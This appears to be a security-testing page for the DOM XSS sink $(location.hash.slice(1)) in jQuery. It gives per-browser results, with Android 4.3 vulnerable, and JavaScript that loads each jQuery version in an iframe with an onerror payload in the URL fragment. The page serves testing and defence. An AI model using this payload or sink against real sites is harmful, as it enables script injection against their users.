jQuery ID selector + location.hash.slice(1)

// Sink under test: the URL fragment, minus its leading '#', is handed straight to $().
// The fragment is controlled by whoever builds the link, and with the '#' stripped it can
// begin with '<', which $() treats as markup to construct rather than a selector to look up.
// The per-browser results on this page differ for the same call, so a "Safe" row describes
// one browser/jQuery pair, not the pattern.
// Safer: use the fragment only as an id, e.g. $(document.getElementById(location.hash.slice(1))).
$(location.hash.slice(1))

By
Psych0tr1a 0 Seen 643 times
Tags
DOM XSS Jquery Selector

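Results

Each row is the outcome of the probe below for one jQuery version in the listed browser. The same call is reported Vulnerable in one browser and Safe in the others, so a Safe row applies to that browser and version only, not to the $(location.hash.slice(1)) pattern in general.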


Tested on
Chrome - 67 - Windows 7
jQuery version | Status
jQuery 2.0.2 | Safe
jQuery 2.0.3 | Safe
jQuery 2.0.0 | Safe
jQuery 1.8.3 | Safe
jQuery 1.9.1 | Safe
jQuery 1.10.1 | Safe
jQuery 1.10.2 | Safe
jQuery 1.10.0 | Safe
jQuery 1.9.0 | Safe
jQuery 2.0.1 | Safe
jQuery 1.5.0 | Safe
jQuery 1.3.2 | Safe
jQuery 1.6.0 | Safe
jQuery 1.8.2 | Safe
jQuery 1.8.1 | Safe
jQuery 1.4.3 | Safe
jQuery 1.3.1 | Safe
jQuery 1.4.2 | Safe
jQuery 1.4.4 | Safe
jQuery 1.8.0 | Safe
jQuery 1.4.1 | Safe
jQuery 1.2.6 | Safe
jQuery 1.4.0 | Safe
jQuery 1.2.3 | Safe
jQuery 1.3.0 | Safe
jQuery 1.7.1 | Safe
jQuery 1.7.0 | Safe
jQuery 1.6.4 | Safe
jQuery 1.7.2 | Safe
jQuery 1.6.3 | Safe
jQuery 1.6.1 | Safe
jQuery 1.6.2 | Safe
jQuery 1.5.2 | Safe
jQuery 1.5.1 | Safe

Tested on
Firefox - 52 - Linux
jQuery version | Status
jQuery 2.0.3 | Safe
jQuery 2.0.2 | Safe
jQuery 1.10.2 | Safe
jQuery 1.10.1 | Safe
jQuery 2.0.1 | Safe
jQuery 1.10.0 | Safe
jQuery 2.0.0 | Safe
jQuery 1.9.1 | Safe
jQuery 1.8.3 | Safe
jQuery 1.9.0 | Safe
jQuery 1.6.4 | Safe
jQuery 1.6.2 | Safe
jQuery 1.6.0 | Safe
jQuery 1.5.2 | Safe
jQuery 1.6.3 | Safe
jQuery 1.6.1 | Safe
jQuery 1.5.1 | Safe
jQuery 1.5.0 | Safe
jQuery 1.4.4 | Safe
jQuery 1.4.3 | Safe
jQuery 1.4.2 | Safe
jQuery 1.4.1 | Safe
jQuery 1.4.0 | Safe
jQuery 1.3.2 | Safe
jQuery 1.2.6 | Safe
jQuery 1.2.3 | Safe
jQuery 1.3.0 | Safe
jQuery 1.8.1 | Safe
jQuery 1.8.0 | Safe
jQuery 1.8.2 | Safe
jQuery 1.7.2 | Safe
jQuery 1.7.1 | Safe
jQuery 1.7.0 | Safe
jQuery 1.3.1 | Safe

Tested on
Chrome Mobile - 41 - Android
jQuery version | Status
jQuery 2.0.3 | Safe
jQuery 2.0.2 | Safe
jQuery 2.0.1 | Safe
jQuery 2.0.0 | Safe
jQuery 1.10.2 | Safe
jQuery 1.10.1 | Safe
jQuery 1.10.0 | Safe
jQuery 1.9.1 | Safe
jQuery 1.9.0 | Safe
jQuery 1.8.3 | Safe
jQuery 1.8.2 | Safe
jQuery 1.8.1 | Safe
jQuery 1.8.0 | Safe
jQuery 1.7.2 | Safe
jQuery 1.7.1 | Safe
jQuery 1.7.0 | Safe
jQuery 1.6.4 | Safe
jQuery 1.6.3 | Safe
jQuery 1.6.2 | Safe
jQuery 1.6.1 | Safe
jQuery 1.6.0 | Safe
jQuery 1.5.2 | Safe
jQuery 1.5.1 | Safe
jQuery 1.5.0 | Safe
jQuery 1.4.4 | Safe
jQuery 1.4.3 | Safe
jQuery 1.4.2 | Safe
jQuery 1.4.1 | Safe
jQuery 1.4.0 | Safe
jQuery 1.3.2 | Safe
jQuery 1.3.1 | Safe
jQuery 1.3.0 | Safe
jQuery 1.2.6 | Safe
jQuery 1.2.3 | Safe

Tested on
Googlebot - 2.1 - undefined
jQuery version | Status
jQuery 2.0.3 | Safe
jQuery 2.0.2 | Safe
jQuery 2.0.1 | Safe
jQuery 2.0.0 | Safe
jQuery 1.10.2 | Safe
jQuery 1.10.1 | Safe
jQuery 1.10.0 | Safe
jQuery 1.9.1 | Safe
jQuery 1.9.0 | Safe
jQuery 1.8.3 | Safe
jQuery 1.8.2 | Safe
jQuery 1.8.1 | Safe
jQuery 1.8.0 | Safe
jQuery 1.7.2 | Safe
jQuery 1.7.1 | Safe
jQuery 1.7.0 | Safe
jQuery 1.6.4 | Safe
jQuery 1.6.3 | Safe
jQuery 1.6.2 | Safe
jQuery 1.6.1 | Safe
jQuery 1.6.0 | Safe
jQuery 1.5.2 | Safe
jQuery 1.5.1 | Safe
jQuery 1.5.0 | Safe
jQuery 1.4.4 | Safe
jQuery 1.4.3 | Safe
jQuery 1.4.2 | Safe
jQuery 1.4.1 | Safe
jQuery 1.4.0 | Safe
jQuery 1.3.2 | Safe
jQuery 1.3.1 | Safe
jQuery 1.3.0 | Safe
jQuery 1.2.6 | Safe
jQuery 1.2.3 | Safe

Tested on
Android - 4.3 - Android
jQuery version | Status
jQuery 2.0.3 | Vulnerable
jQuery 2.0.2 | Vulnerable
jQuery 1.10.2 | Vulnerable
jQuery 1.10.1 | Vulnerable
jQuery 2.0.0 | Vulnerable
jQuery 1.9.0 | Vulnerable
jQuery 1.9.1 | Vulnerable
jQuery 1.10.0 | Vulnerable
jQuery 2.0.1 | Vulnerable
jQuery 1.8.3 | Vulnerable
jQuery 1.8.2 | Vulnerable
jQuery 1.8.1 | Vulnerable
jQuery 1.8.0 | Vulnerable
jQuery 1.7.2 | Vulnerable
jQuery 1.7.1 | Vulnerable
jQuery 1.7.0 | Vulnerable
jQuery 1.6.4 | Vulnerable
jQuery 1.6.3 | Vulnerable
jQuery 1.6.2 | Vulnerable
jQuery 1.6.1 | Vulnerable
jQuery 1.6.0 | Vulnerable
jQuery 1.5.2 | Vulnerable
jQuery 1.5.1 | Vulnerable
jQuery 1.5.0 | Vulnerable
jQuery 1.4.4 | Vulnerable
jQuery 1.4.3 | Vulnerable
jQuery 1.4.2 | Vulnerable
jQuery 1.4.1 | Vulnerable
jQuery 1.4.0 | Vulnerable
jQuery 1.3.2 | Vulnerable
jQuery 1.3.1 | Vulnerable
jQuery 1.2.6 | Vulnerable
jQuery 1.3.0 | Vulnerable
jQuery 1.2.3 | Vulnerable

User Script (ENUM_FUNCTION)

					
// Version string of the jQuery build currently under test. test() writes it;
// vulnerable() and safe() read it when they label a result.
var jQuery_version = "";

/**
 * Reports the jQuery version held in jQuery_version as vulnerable.
 * Called from the probe iframe as parent.vulnerable() when the injected
 * onerror handler ran.
 */
function vulnerable(){
	// addError comes from the hosting page. The status text carries markup,
	// so it is presumably rendered as HTML there - TODO confirm.
	var label = 'jQuery ' + jQuery_version;
	var status = '<b>Vulnerable</b>';
	addError(label, status);
}

/**
 * Reports the jQuery version held in jQuery_version as safe.
 * Called from the probe iframe as parent.safe() when the injected onerror
 * handler did not run within the probe's timeout.
 */
function safe(){
	// addSuccess comes from the hosting page.
	var label = 'jQuery ' + jQuery_version;
	var status = 'Safe';
	addSuccess(label, status);
}
	
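/**
 * Detaches the probe iframe (id 'jQueryFrameID') from the document.
 * Called from the probe iframe as parent.removeIframe() once it has reported.
 * Does nothing when no such element is attached, so a repeated or late call
 * cannot throw into the iframe's timer callback.
 */
function removeIframe(){
	var frame = document.getElementById('jQueryFrameID');
	// getElementById returns the first match only; every probe frame shares this id.
	if (!frame || !frame.parentNode) {
		return;
	}
	frame.parentNode.removeChild(frame);
}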


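/**
 * Runs the $(location.hash.slice(1)) probe against one jQuery release.
 *
 * Creates an iframe and writes into it a page that loads the requested jQuery
 * build from ajax.googleapis.com, sets location.hash to an <img> tag whose
 * onerror handler flips a flag, and passes location.hash.slice(1) to $() on
 * DOM ready. One second later that page calls parent.vulnerable() if the flag
 * was set, parent.safe() otherwise, and then parent.removeIframe().
 *
 * A "safe" verdict only means the handler did not fire in this browser with
 * this jQuery build within the timeout.
 * NOTE(review): the verdict presumably depends on how the browser serialises
 * '<' and '>' when the fragment is read back - confirm before generalising.
 *
 * Any exception is reported through addInfo instead of being thrown.
 *
 * @param {string} data jQuery version to load, e.g. '1.10.2'.
 */
function test(data){
	try{
		console.log(data);

		// vulnerable() and safe() build their label from this shared variable
		// when the iframe's timer fires.
		// NOTE(review): overlapping runs would be labelled with whichever version
		// was assigned last - confirm the harness runs one version at a time.
		jQuery_version = data;

		var jQueryFrame = document.createElement('iframe');
		jQueryFrame.id = 'jQueryFrameID';
		// NOTE(review): the script URL is protocol-relative and carries no
		// integrity attribute, so the probe trusts whatever the network returns.
		var exploitHTML = '<script src="//ajax.googleapis.com/ajax/libs/jquery/'+ jQuery_version.toString() +'/jquery.js"><\/script><script>var tst=0;location.hash="<img src=s onerror=tst=1>";$(function(){$(location.hash.slice(1))});setTimeout("if(tst==1){parent.vulnerable()}else{parent.safe()};parent.removeIframe()",1000)<\/script>';
		document.body.appendChild(jQueryFrame);
		// Kept local so the frame's document does not leak into the page's globals.
		var iframeDoc = jQueryFrame.contentDocument || jQueryFrame.contentWindow.document;
		iframeDoc.open();
		iframeDoc.write(exploitHTML);
		iframeDoc.close();
	}
	catch(err){
		addInfo(jQuery_version , 'Some Error Occured: ' + err);
	}
}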

					
				

Enum Data (ENUM_FUNCTION)

					
// jQuery releases fed to test(), one call per entry, newest first.
var data = [
	'2.0.3', '2.0.2', '2.0.1', '2.0.0',
	'1.10.2', '1.10.1', '1.10.0',
	'1.9.1', '1.9.0',
	'1.8.3', '1.8.2', '1.8.1', '1.8.0',
	'1.7.2', '1.7.1', '1.7.0',
	'1.6.4', '1.6.3', '1.6.2', '1.6.1', '1.6.0',
	'1.5.2', '1.5.1', '1.5.0',
	'1.4.4', '1.4.3', '1.4.2', '1.4.1', '1.4.0',
	'1.3.2', '1.3.1', '1.3.0',
	'1.2.6', '1.2.3'
];